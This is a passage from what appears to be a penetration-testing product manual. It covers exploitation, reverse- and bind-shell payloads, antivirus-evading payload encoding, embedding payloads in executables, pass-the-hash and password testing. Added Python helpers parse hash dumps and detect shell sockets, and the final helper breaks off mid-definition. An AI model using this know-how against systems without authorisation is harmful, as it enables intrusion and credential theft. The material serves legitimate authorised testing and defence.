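_ESCAPE = re.compile(rb"\\x([0-9A-Fa-f]{2})")    # the importer's \xXX notation

# The PWDump example line from this chapter of the guide.
PWDUMP_EXAMPLE = ("administrator:501:de8130a284642c74523fa0f66c35ef02:"
                  "421a1c7abc7b160c20ed78a2e06e09c8:::")


def decode_escapes(field):
    """Turn the \\xXX notation the importer accepts into raw bytes."""
    return _ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), field.encode("utf-8"))


def parse_pwdump_line(line):
    """Split user:rid:LM:NT::: and report weak-storage indicators for the account."""
    parts = line.strip().split(":")
    if len(parts) != 7:
        raise ValueError(f"expected 7 colon-separated fields, got {len(parts)}")
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    for h in (lm, nt):
        if not re.fullmatch(r"[0-9a-f]{32}", h):
            raise ValueError(f"{h!r} is not a 32-hex-digit hash")
    return {
        "user": user,
        "rid": rid,
        "lm_hash": lm,
        "nt_hash": nt,
        "lm_stored": lm != EMPTY_LM,       # a real LM hash is present: legacy, easily cracked storage
        "empty_password": nt == EMPTY_NT,  # NT hash of the empty string
    }


def parse_userpass(text):
    """'username password1 password2' per line -> {user: [passwords as bytes]}."""
    creds = {}
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        creds[fields[0]] = [decode_escapes(p) for p in fields[1:]]
    return creds


def parse_single_column(text):
    """Passwords-only or user-names-only file: one value per non-empty line."""
    return [decode_escapes(l.strip()) for l in text.splitlines() if l.strip()]


def detect_format(text):
    """Guess which importer a file is for; single-column files stay ambiguous."""
    first = next((l for l in text.splitlines() if l.strip()), "")
    if first.count(":") == 6:
        return "pwdump"
    if len(first.split()) >= 2:
        return "userpass"
    return "single-column"


if __name__ == "__main__":
    print(parse_pwdump_line(PWDUMP_EXAMPLE))
    print(parse_userpass("username1 passwordA\nusername2 passwordA passwordB\nusername3"))
    print(parse_single_column("password1\npassword2\npassword3"))
    print(detect_format("jack\njoe\njohn"))
```

On the guide's example line the parser reports that an LM hash is stored for administrator and that the password is not empty; a line with the wrong number of fields or a malformed hash raises instead of being imported.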
Word Lists
A word list is an exhaustive list of common passwords and terms that a bruteforce attack or password cracker can use to attempt to guess the login credentials for a particular account. By default, Metasploit Pro provides several different word lists, but you can add your own custom word lists for the bruteforce attack to use.
6. Click Show Advanced Options and configure any additional options for the bruteforce attack.
7. Under Credential Selection, locate the Imported Credential Files list. Select the credential file, or keyword list, that you want to use.
8. Run the bruteforce attack.
Chapter 10:
Exploitation
About Exploitation on page 235
Components of an Exploit on page 237
Common Exploitation Tasks on page 238
Automated Exploits on page 235
Manual Exploits on page 235
About Exploitation
An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system. Exploits include buffer overflow, code injection, and web application exploits. Metasploit Pro offers automated exploits and manual exploits. The type of exploit that you use depends on the level of granular control you want over the exploits.
Automated Exploits
When you run an automated exploit, Metasploit Pro builds an attack plan based on the service, operating system, and vulnerability information that it has for the target system. Automated exploits cross reference open ports, imported vulnerabilities, and fingerprint information with exploit modules. The attack plan defines the exploit modules that Metasploit Pro will use to attack the target systems. An automated exploit uses reverse connect or bind listener payloads and does not abuse normal authenticated control mechanisms. To run an automated exploit, you must specify the hosts that you want to exploit and the minimum reliability setting that Metasploit Pro should use. The minimum reliability setting indicates the potential impact that the exploits have on the target system. If you use a high ranking, such as excellent or great, Metasploit Pro uses exploits that will be unlikely to crash the service or system. Exploits that typically have a high reliability ranking include SQL injection exploits, web application exploits, and command execution exploits. Exploits that corrupt memory will most likely not have a high reliability ranking. You can also specify the payload type that you want the exploit to use. By default, automated exploits use Meterpreter, but you can choose to use a command shell instead.
Manual Exploits
A manual exploit is a module that you can select and run individually. You perform a manual exploit when you want to exploit a known vulnerability. You choose the exploit module based on the information you have about the host. For example, if you know that the host runs Windows Service Pack 1, you can run an exploit that targets Windows Service Pack 1 vulnerabilities. Or if you know that the target system has a specific vulnerability that you want to test, you can run the exploit that targets that particular weakness.
Manual exploitation provides granular control over the module and evasion options that an exploit uses. Whereas automated exploits enable you to run multiple exploits simultaneously, manual exploits enable you to run one exploit at a time. The options and instructions that you perform for manual exploits vary based on the exploit that you choose to run. Therefore, use the following instructions as a guideline to manually run exploits.
Components of an Exploit
The following sections describe the different components that make up an exploit.
Module
A module is a prepackaged collection of code that performs a specific task, such as running an Nmap scan or a particular exploit.
Payload
A payload is the actual code that executes on the target system after an exploit successfully executes. There are a couple of types of payloads: reverse shell and bind shell. The major difference between a reverse shell and a bind shell is how the shell enables you to connect to the exploited system. A reverse shell creates a connection from the target machine back to you as a command prompt. A bind shell, on the other hand, attaches a command prompt to a listening port on the exploited system. You can connect to the bind shell to access the exploited system.
Listeners
After an exploit successfully compromises a target system, Metasploit Pro uses a listener to wait for an incoming connection from the exploited system. The listener is the component that handles persistent agents from exploited systems. When you create a listener, you associate the listener to a specific project. Therefore, when an exploited target makes a connection with the listener, you see an active session open in the project. Note: You can create global listeners that you can use across multiple projects. However, only one project can use the listener at a time. You assign a post-exploitation macro to each listener. When the exploited system makes a connection with the attacking system, Metasploit Pro launches the post-exploitation macro. Listeners stop after you delete a project or you manually stop a listener.
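The two payload shapes described above leave different traces on the compromised host: a bind shell is a shell process attached to a listening port, and a reverse shell is a shell process holding an outbound connection to the listener. As an added example (not code from this guide or from Metasploit Pro), the Python script below triages a netstat-style socket table for those two patterns and for call-backs to the handler port this guide uses in its listener example (4444). The socket rows, the shell-binary set, the expected-listener allow-list and the handler-port set are assumptions constructed for the demonstration.

```python
"""Triage a socket table for bind-shell and reverse-shell indicators.

Added example for this guide; it is not Metasploit Pro code. The rows below
are constructed netstat-style records, and the process allow-list and the
handler port set are assumptions for the demonstration.
"""
from collections import namedtuple

Socket = namedtuple("Socket", "proto local remote state program")

# Shell binaries that have no business owning a network socket on a typical
# server: a shell bound to a port is the bind-shell pattern, a shell holding
# an outbound connection is the reverse-shell pattern.
SHELL_PROGRAMS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
# Programs this (hypothetical) host is expected to listen with.
EXPECTED_LISTENERS = {"sshd", "nginx"}
# Remote ports a reverse payload connects back to; 4444 is the listener port
# this guide uses in its example.
HANDLER_PORTS = {4444}

# Constructed rows, not output from the guide or from any real host.
SAMPLE_SOCKETS = [
    Socket("tcp", "0.0.0.0:22", "0.0.0.0:*", "LISTEN", "sshd"),
    Socket("tcp", "0.0.0.0:443", "0.0.0.0:*", "LISTEN", "nginx"),
    Socket("tcp", "0.0.0.0:8081", "0.0.0.0:*", "LISTEN", "python3"),
    Socket("tcp", "0.0.0.0:31337", "0.0.0.0:*", "LISTEN", "sh"),
    Socket("tcp", "10.0.0.12:49152", "203.0.113.7:4444", "ESTABLISHED", "cmd.exe"),
    Socket("tcp", "10.0.0.12:49153", "203.0.113.9:443", "ESTABLISHED", "firefox"),
    Socket("tcp", "10.0.0.12:49154", "203.0.113.20:4444", "ESTABLISHED", "svchost.exe"),
    Socket("tcp", "10.0.0.12:22", "10.0.0.50:51000", "ESTABLISHED", "sshd"),
]


def split_addr(addr):
    """'1.2.3.4:443' -> ('1.2.3.4', 443); a '*' port becomes None."""
    host, _, port = addr.rpartition(":")
    return host, (None if port == "*" else int(port))


def classify_socket(sock, shells=SHELL_PROGRAMS, expected=EXPECTED_LISTENERS,
                    handler_ports=HANDLER_PORTS):
    """Return a finding label for one socket row, or None if it looks benign."""
    prog = sock.program.lower()
    _, rport = split_addr(sock.remote)
    if sock.state == "LISTEN":
        if prog in shells:
            return "bind-shell"            # command shell attached to a listening port
        if prog not in expected:
            return "unexpected-listener"   # not on the allow-list; needs review
        return None
    if sock.state == "ESTABLISHED":
        if prog in shells:
            return "reverse-shell"         # shell holding an outbound connection
        if rport in handler_ports:
            return "reverse-connect-handler-port"  # call-back to a known handler port
    return None


def find_suspicious(sockets):
    """Apply classify_socket to every row and keep the hits."""
    hits = []
    for s in sockets:
        kind = classify_socket(s)
        if kind:
            hits.append({"local": s.local, "remote": s.remote,
                         "program": s.program, "kind": kind})
    return hits


if __name__ == "__main__":
    for h in find_suspicious(SAMPLE_SOCKETS):
        print(f'{h["kind"]:28} {h["program"]:12} {h["local"]} -> {h["remote"]}')
```

The port-based rule is the weakest of the four, since a handler can listen on any port, which is why the shell-process rules come first; the allow-list rule catches the case where the shell is wrapped in some other binary.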
9. Define the exploit selection options. This determines the ports that the exploit includes and excludes from the attack.
10. Define the advanced options. The advanced options let you define the number of exploits you can run concurrently, the timeout for each exploit, and evasion options.
11. Run the exploit.
Setting Up a Listener
1. Select Administration > Global Settings from the main menu.
2. Click New Listener, which is located under Persistent Listeners.
3. When the Create a Listener window appears, choose an associated project for the listener.
4. Define the listener payload type.
5. Enter an IP address for the listener.
6. Enter a port for the listener.
7. Choose a post-exploitation macro to deploy after the listener connects to the target system. Enable the listener.
8. Save the listener.
Stopping a Listener
To stop a listener, you can either delete the listener from the system or you can stop the listener from the Task screen.
1. From within a project, click the Tasks tab.
2. Find the listening tasks.
3. Click the Stop button in the Timestamp/Duration column.
Chapter 11:
Payloads
You use the payload generator when you need to build a standalone binary file that delivers a custom-built payload. Binary files, such as .exe and .bin files, are typically delivered through client-side exploits, such as phishing e-mails or social engineering attacks, which means that you will probably need to be able to bypass anti-virus detection to execute the shellcode on the target system. To help reduce anti-virus detection, the Payload Generator enables you to do things like encode the payload and use a dynamic executable. Payloads are generated globally, outside the context of a project. This means that payloads are generated on the fly, can only be downloaded once, and are not tied to a particular project. They are useful when you need to quickly generate an executable payload for a single use.
Command - A command execution payload that enables you to execute commands on the remote machine.
Meterpreter - An advanced payload that provides a command line that enables you to deliver commands and inject extensions on the fly.

Stager - Specifies the type of stager that the payload will use to set up the network connection between the target machine and the payload handler running on the Metasploit server. The stager enables you to use a smaller payload to load and inject a larger, more complex payload called the stage. Choose one of the following stagers:
Reverse TCP - Creates a connection from the target machine back to the Metasploit server over TCP.
Bind TCP - Binds a command prompt to a listening port on the target machine so that the Metasploit server can connect to it.
Reverse HTTP - Creates a connection from the target machine back to the Metasploit server over HTTP.
Reverse HTTPS - Creates a connection from the target machine back to the Metasploit server over HTTPS.

Stage - Specifies the payload that is delivered by the stager.
LHOST - Defines the IP address the payload connects back to. (Reverse connections only)
LPORT - Defines the port the payload connects back to.
RHOST - Defines the port that the listener binds to. (Bind connections only)
3. Click the Stager dropdown and choose one of the following: Reverse TCP, Bind TCP, Reverse HTTP, or Reverse HTTPS.
4. Click the Stage dropdown and choose the stage you want the stager to download. The list will display applicable stages for the stager you have selected.
5. Enter the IP address that you want the payload to connect back to in the LHOST field. (Reverse connections only)
6. Enter the port that you want the payload to connect back to in the LPORT field.
7. Enter the port that you want the listener to bind to in the RHOST field. (Bind connections only)
8. Click Generate. If the payload generates without error, a window appears and alerts you that the payload has been generated and is ready for you to download. Click Download Now to automatically download the executable.
If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the executable to your computer.
Architecture
AIX
Android
BSD - sparc and x86
BSDi
Firefox
Java
Linux - armle, cbea, cbea64, java, mipsbe, mipsle, ppc, ppc64, x86, and x86_64
Netware
NodeJS
OSX - armle, java, ppc, x86, and x86_64
PHP - armbe, armle, cbea, cbea64, cmd, dalvik, firefox, java, mips, mipsbe, mipsle, nodejs, php, ppc, ppc64, python, ruby, sparc, x86, and x86_64
Solaris - java, sparc, and x86
Unix - cmd, java, and tty
Windows - cmd, java, x86, and x86_64
Payload - Specifies the type of payload that the exploit will deliver to the target. The Payload Generator shows you the payloads that are available for the platform you have selected.
Stager - Specifies the type of stager that the payload will use to set up the network connection between the target machine and the payload handler running on the Metasploit server. The stager enables you to use a smaller payload to load and inject a larger, more complex payload called the stage. The list of stagers that are available will vary based on the platform and architecture that you have selected.
Exit Function - Specifies the function to call when a payload completes so that it can safely exit a thread. Choose one of the following exit functions:
Thread - Calls the ExitThread API function.
Process - Calls the ExitProcess API function.
SEH - Restarts the thread when an error occurs.
None - Enables the thread to continue executing so that you can serially run multiple payloads together.
LHOST - Defines the IP address that you want the target host to connect back to.
LPORT - Defines the port that you want to use for reverse connections.
Enables you to specify an additional shellcode file that will run in a separate, parallel thread while the main thread executes the payload.
Size of NOP Sled - Defines the length of the NOP sled you want to prepend to the payload. Each NOP you add to the payload adds 1 byte to the total payload size.
Note: The options that are available for a payload vary based on its architecture, platform, and payload type.
There are many different encoders that are available in the Metasploit Framework, which can be used for various situations. For example, some encoders, such as alpha_mixed and alpha_lower, can be used to replace characters with all alphanumeric characters, which can be useful for applications that only accept text-based characters as input. Other encoders, such as the very reliable and highly ranked shikata_ga_nai, are polymorphic XOR encoders that use an XOR encrypting scheme to help evade detection. Encoding options are only available for the following platforms:
AIX
BSD sparc
BSD x86
BSDi
Linux mipsbe
Linux mipsle
Linux ppc
Linux x86
Linux x86_64
Netware
OSX ppc
OSX x86
OSX x86_64
PHP
Platform sparc
Platform x86
Platform x86_64
Python cmd
Solaris sparc
Solaris x86
Unix cmd
Windows cmd
Windows x86
Windows x86_64
Encoding Options
You can use the following options to encode a payload:
Encoder - Sets the encoder that is used to encode the payload. The Payload Generator only displays the encoders that are applicable to the platform and architecture you have selected.
Number of Iterations - Specifies the number of times that you want to encode the payload. The more times you encode a payload, the larger the payload becomes. You may need to modify the number of iterations if it causes the payload to exceed the maximum payload size.
Maximum Size of Payload - Defines the maximum size of the resulting payload in bytes. The maximum size takes precedence over the encoding iterations. If the encoder causes the payload to exceed the maximum size you have specified, the Payload Generator will display an error message. To fix the error, you can select a new encoder, modify the number of iterations, or set a different maximum payload size.
Bad Characters - Specifies the list of characters that you do not want to appear in the payload, such as spaces, carriage returns, line feeds, tabs, and null bytes. You must enter the values in hex. You can copy and paste the hex characters into the text box. The text editor will attempt to format the hex
Output Options
You can use the following options to create the binary file:
Format - Specifies the format to use to output the payload. Choose from the following formats: executable, raw bytes, or shellcode buffer.
Preserve original functionality of executable - Enables you to inject the payload into an existing executable and retain the functionality of the original executable. The resulting executable will function like the original one. You should only enable this option if you have uploaded a template file.
Template file - Specifies the executable template that you want to use to run in the main thread. For example, you can embed the payload in an executable, like calc.exe. When the executable runs, it creates a separate thread for the payload that runs in the background and continues to run calc.exe in the main thread.
3. Click the Platform dropdown button and choose one of the available platforms. For a list of supported platforms, see Classic Payload Options on page 246.
4. Click the Architecture dropdown button and select one of the available processor architecture types.
The list of architecture types will vary based on the platform that you have selected. Some platforms, such as Android and AIX, will not have an architecture to choose. From this point on, the steps will vary depending on the platform, architecture, and payload you have selected. Generally, you will need to specify the LHOST (reverse), LPORT, and RHOST (bind) that the payload uses, as well as the output options for the executable. You can also do things like encode the payload. For more information on payload options, see Classic Payload Options on page 246. For more information on output options, see Output Options on page 249. For more information on encoding options, see
If the payload generates without error, a window appears and alerts you that the payload has been generated and is ready for you to download. Click Download Now to automatically start the download process. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the payload to your computer.
Listeners
A listener is the component that waits for an incoming connection from an exploited system. You must set up a listener if you intend to establish a connection between your Metasploit server and the exploited machine. For example, if you have delivered an executable to a target host, you will need to set up a listener to wait for a connection from it. When the host connects to the listener, a session opens on their machine, which will enable you to interact with it to do things like collect evidence from their system. In Metasploit Pro, you can set up persistent listeners, which will continuously listen for connect backs from a compromised host. You can set up a persistent listener from the Global Settings area of the web interface. Each listener is bound to a specific project. To set up a listener, you will need to define the listening host, listening port, and payload type. You can also assign a post-exploitation macro to the listener, so that when the exploited system connects back to the listener, Metasploit Pro runs the macro.
Setting Up a Listener
1. Select Administration > Global Settings.
2. Find the Persistent Listeners section.
3. Click the New Listener button.
4. When the Create a Listener form appears, specify the following:
Associated project - Choose the project you want to use to access and manage open sessions.
Listener payload - Choose the appropriate payload for the listener.
Listener Address - Specify the IP address that you want the payload to connect back to (e.g., the IP address of the Metasploit server).
Listener Port - Specify the port you set up for the handler when you generated the Windows Meterpreter Reverse TCP payload (e.g., 4444).
Chapter 12:
MetaModules
About MetaModules on page 254
Segmentation and Firewall Testing MetaModule on page 280
Known Credentials Intrusion MetaModule on page 276
Passive Network Discovery MetaModule on page 284
Pass the Hash MetaModule on page 271
Single Password Testing MetaModule on page 261
SSH Key Testing MetaModule on page 267
About MetaModules
A MetaModule is a Metasploit Pro feature that provides a guided interface to walk you through a single penetration testing task. Each MetaModule leverages the core functionality of a module, such as password testing or passive network discovery, but enables you to quickly configure and run the module with minimal setup. Traditionally, in Metasploit Pro, there is quite a bit of manual configuration that you have to do in order to perform certain tasks. It requires knowledge of the various modules that are available in the Metasploit Framework and an understanding of how to configure and use them. This process can be daunting. This is where MetaModules come into the picture. The best way to think of a MetaModule is as a module with a wizard. Like regular modules, MetaModules are prepackaged mini programs that you can run to perform a specific task, such as bruteforcing or scanning a target. Unlike modules, MetaModules guide you through their configuration. For example, most MetaModules need you to define the target scope, set up the test options, and generate a report. MetaModules are added to and updated in Metasploit Pro regularly, so you should always grab the latest software update to get the newest MetaModules. To see all the latest MetaModules, select Modules > MetaModules from the Main Menu.
MetaModule Runs
Select Modules > MetaModules from the Main Menu. When the Overview page appears, click the View All button. The MetaModule Runs page appears.
From the MetaModules Runs page, you can view the findings for a MetaModule and delete a MetaModule run from the project.
MetaModule Findings
After you launch a MetaModule run, the Findings window appears and shows you the real time statistics and the events for the MetaModule run.
Statistics - Shows real-time statistics for the MetaModule run. The information that the Findings window shows varies based on the MetaModule that is running.
Task Log - Shows a detailed log of events for a MetaModule run.
You can click on the Statistics tab or the Task Log tab to switch between views on the Findings window.
MetaModule Findings
After a MetaModule completes its run, you can view the findings for the test from the MetaModule Runs page. The findings vary based on the MetaModule you choose to view. The following list describes the information that each MetaModule reports on the Findings window.
Firewall Egress Test Findings - Shows the total number of open ports, closed ports, and filtered ports.
Passive Network Discovery Findings - Shows the number of total packets captured, data captured, and hosts that were identified.
Known Credentials Intrusion Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to and the number of sessions it was able to open.
Pass the Hash Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.
Single Password Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.
SSH Key Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.
3. Find the MetaModule run that you want to view the findings for.
4. Click Findings. The Findings window appears and shows you the results from the MetaModule run.
To view the last run stats, select Modules > MetaModules from the Main Menu. The Overview page appears and shows the last run stats at the top of the page.
3. Find the MetaModule run that you want to stop. It must have a Running status.
4. Click Stop. The status changes from Running to Aborted.
Lockout Risks
An account lockout disables an account and prevents you from accessing the account for the duration of the lockout period. When you configure the Single Password Testing MetaModule, you should factor in the lockout risk for the services that you choose. Each service is categorized into the following lockout risks:
Low Risk - Any service that typically does not enforce account lockouts, such as AFP, DB2, EXEC, FTP, HTTP, HTTPS, LOGIN, Oracle, Postgres, SHELL, SNMP, SSH_PUBKEY, Telnet, and VNC.
Medium Risk - Any service that typically enforces account lockouts, such as MSSQL, MySQL, POP3, and SSH.
High Risk - Any service that uses Windows authentication, such as PC Anywhere, SMB, vmauthd, and WinRM.
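The practical use of these tiers is a pre-flight check before launching: a single password test makes one attempt per account per selected service, and every high-risk service validates that attempt against the same Windows account database, so the attempts add up against one per-account lockout counter. The following Python is an added example written for this guide, not Metasploit Pro code. The three tiers are the guide's; the lockout threshold, safety margin and selected services are constructed placeholders for a real target domain's password policy, and the shared-counter assumption is labelled in the code.

```python
"""Pre-flight lockout check for a Single Password Testing scope.

Added example, not Metasploit Pro code. The three risk tiers are the guide's;
the selected services, lockout threshold and safety margin passed in below are
constructed placeholders standing in for a real target domain's password policy.
"""

LOW_RISK = ("AFP", "DB2", "EXEC", "FTP", "HTTP", "HTTPS", "LOGIN", "Oracle",
            "Postgres", "SHELL", "SNMP", "SSH_PUBKEY", "Telnet", "VNC")
MEDIUM_RISK = ("MSSQL", "MySQL", "POP3", "SSH")
HIGH_RISK = ("PC Anywhere", "SMB", "vmauthd", "WinRM")

LOCKOUT_RISK = {
    service: tier
    for tier, services in (("low", LOW_RISK), ("medium", MEDIUM_RISK), ("high", HIGH_RISK))
    for service in services
}


def plan_single_password_test(selected_services, lockout_threshold, safety_margin=1):
    """Group the selected services by lockout risk and estimate per-account exposure.

    Assumption (this example, not the guide): every high-risk service validates the
    guess against the same Windows account database, so each one adds a failed attempt
    to the same per-account lockout counter. A single password test makes exactly one
    attempt per account per service, so attempts per account = number of high-risk
    services selected. lockout_threshold follows the Windows convention where 0 means
    the policy never locks accounts.
    """
    by_tier = {"low": [], "medium": [], "high": []}
    unknown = []
    for service in selected_services:
        tier = LOCKOUT_RISK.get(service)
        if tier is None:
            unknown.append(service)      # not in the guide's table: classify before launching
        else:
            by_tier[tier].append(service)

    windows_attempts = len(by_tier["high"])
    if lockout_threshold == 0:
        budget = None                    # no lockout policy in force
        over_by = 0
    else:
        # Keep a margin so a user's own typo after the test does not lock them out.
        budget = max(0, lockout_threshold - safety_margin)
        over_by = max(0, windows_attempts - budget)

    return {
        "by_tier": by_tier,
        "unknown_services": unknown,
        "windows_attempts_per_account": windows_attempts,
        "attempt_budget": budget,
        "high_risk_services_to_drop": over_by,
        "safe_to_launch": over_by == 0 and not unknown,
    }


if __name__ == "__main__":
    # Constructed scope: a domain with a 3-attempt lockout threshold.
    plan = plan_single_password_test(["HTTP", "SSH", "SMB", "WinRM", "PC Anywhere"],
                                     lockout_threshold=3)
    for key, value in plan.items():
        print(f"{key}: {value}")
```

Medium-risk services are reported but not counted: each enforces its own lockout independently, and one attempt per service stays below any sane threshold. Anything the guide does not classify is returned separately so it can be placed in a tier before the test is launched.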
2. Find the Single Password Testing MetaModule and click the Launch button. The Single Password Testing window appears.
3. From the Scope tab, enter the target address range you want to use for the test. The target address range must match the hosts in the workspace.
4. Click on the Services and Ports tab. The Services form appears.
5. Select the services that you want to attempt to authenticate. All services are categorized based on their lockout risk, which is the likelihood that the service enforces account lockouts.
6. Click on the Credentials tab. The Credentials form appears.
7. You can choose one of the following options to supply the MetaModule with credentials:
Enter a known credential pair - You need to manually enter the user name and password combination that you want the MetaModule to use. Use this method for credentials obtained from phishing attacks.
Choose an existing credential pair - You can select the user name and password combination from a list of known credentials. These credentials were obtained from a bruteforce attack, discovery scan, or data import.
9. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
10. Select PDF, Word, RTF, or HTML for the report format.
11. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
12. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.
Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
13. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and task log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.
After the MetaModule completes its run, go to the Reports area to view the Single Password Testing Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of authenticated services and hosts. For a more detailed look at the compromised hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
2. Find the SSH Key Testing MetaModule and click the Launch button. The SSH Key Testing window appears.
3. From the Scope tab, enter the target address range you want to use for the test.
4. Click on the Credentials tab. The Credentials form appears.
5. Choose one of the following options to supply the MetaModule with an SSH private key:
Enter a known credential pair - You need to manually enter the user name, and then browse to the location of the private key that you want the MetaModule to use.
Choose an existing SSH key - You can select a user name and SSH key from a list of looted keys. These keys were obtained from a bruteforce attack, discovery scan, data import, or exploited system.
6. Click the Report tab. The Report configuration form appears.
7. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
8. Choose whether you want to generate the report as a PDF, HTML, or RTF file.
9. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
10. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.
Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
11. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and task log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.
After the MetaModule completes its run, go to the Reports area to view the SSH Key Testing Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of cracked hosts and services. For a more detailed look at the hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
2. Find the Pass the Hash MetaModule and click the Launch button. The Pass the Hash window appears.
3. From the Scope tab, enter the target address range you want to use for the test in the Address Range field.
4. If there are any hosts that you want to blacklist from the test, click on the Advanced dropdown link and enter the addresses for those hosts in the Excluded Addresses field.
5. Click on the Credentials tab. The Credentials configuration form appears.
6. Choose one of the following options to supply the MetaModule with a raw NTLM hash:
Enter a known credential pair - You need to manually enter the user name, and then enter the raw hash that you want the MetaModule to use. You should leave WORKGROUP as the domain name in order to authenticate to the local machine.
Choose an existing SMB hash - You can select a user name and hash from a list of looted password hashes that are stored in the project.
7. Click the Generate Report tab. The Report configuration form appears.
8. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
9. Choose whether you want to generate the report as a PDF, HTML, or RTF file.
10. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
11. From the Options area, select the Mask discovered passwords option if you want to obscure any password hashes that the report contains.
12. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.
Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
13. Click the Launch button. When the MetaModule launches, the Findings window appears and displays the real-time statistics and task log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.
After the MetaModule completes its run, go to the Reports area to view the Pass the Hash Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of cracked hosts and services. For a more detailed look at the hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.
2. Find the Known Credentials Intrusion MetaModule and click the Launch button. The Known Credentials Intrusion window appears.
3. From the Scope tab, enter the target address range you want to use for the test.
5. Specify the following settings that you want to use for the payload:
Payload type - Choose Meterpreter for Windows or Command shell for Linux systems.
Connection - Choose one of the following connection types:
Auto - Automatically selects the payload type. In most cases, the Auto option selects the reverse shell payload because it is more likely to establish a connection between a target machine and the attacking machine.
Reverse - Select this option if the targets are behind a firewall or use NAT. Typically, a reverse shell payload will work for most situations.
Bind - Select this option if the target devices are unable to initiate a connection.
Listener Ports - The port that you want the listener to listen on for incoming connections. By default, ports 1024-65535 are selected; however, you can define a specific port that you want the listener to use, such as 4444.
Listener Host - The IP address that you want the target machine to connect back to. This is typically going to be the IP address of your local machine. If you do not specify a listener host, the MetaModule automatically uses the IP address of your local machine.
6. Click the Generate Report tab. The Report configuration form appears.
7. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
8. Choose whether you want to generate the report as a PDF, HTML, or RTF file.
9. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
10. From the Options area, select the Mask discovered passwords option if you want to obscure any passwords that the report contains. The report replaces the password with **MASKED**. By default, this option is disabled. You should enable this option if you plan to distribute the report.
11. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.
Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
12. Click the Launch button.
Port States
The Segmentation and Firewall Testing MetaModule uses the following states to categorize ports.
Open
A port is assigned an open state if it allows traffic out of the network and the EGADZ server receives it. An open state indicates that there is an application that is actively accepting TCP connections, UDP datagrams or SCTP associations.
Filtered
A port is assigned a filtered state if it drops the traffic before it reaches the desired port on the EGADZ server. It will not receive a response from the EGADZ server. Typically, a port has a filtered state if a dedicated firewall device, router rules, or host-based firewall software has successfully blocked the port from sending traffic.
Closed
A port is assigned a closed state if it allows traffic through the port, but there is not an application or service bound to the port. A closed port can be used to determine if a host is up on an IP address.
Unfiltered
A port is assigned an unfiltered state if it allows traffic through to the port, but it cannot be determined whether the port is open or closed.
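What a defender does with these four states is compare them against the egress policy the firewall is supposed to enforce: only filtered means the firewall stopped the probe, while open, closed and unfiltered all mean the traffic left the network and reached the egress server. The following Python is an added example written around the guide's state definitions; it is not part of Metasploit Pro, and the observed results and allowed-port policy in it are constructed.

```python
"""Act on Segmentation and Firewall Testing results: compare observed port states
with the intended egress policy.

Added example, not part of Metasploit Pro. The four port states are the guide's;
the observed results and the allowed-port policy in the sample run are constructed.
"""
from collections import Counter

PORT_STATES = ("open", "closed", "filtered", "unfiltered")


def summarize_states(observed):
    """Counts per state, the same totals the Findings window reports.

    observed: {port_number: state}
    """
    bad = {port: state for port, state in observed.items() if state not in PORT_STATES}
    if bad:
        raise ValueError(f"unknown port state(s): {bad}")
    counts = Counter(observed.values())
    return {state: counts.get(state, 0) for state in PORT_STATES}


def evaluate_egress(observed, allowed_ports):
    """Compare observed egress states with the ports policy says may leave the network.

    Returns:
      unexpected_egress    - ports whose probe reached the egress server (open, closed
                             or unfiltered) although policy does not allow them out
      allowed_but_filtered - ports policy allows that the firewall nevertheless blocked
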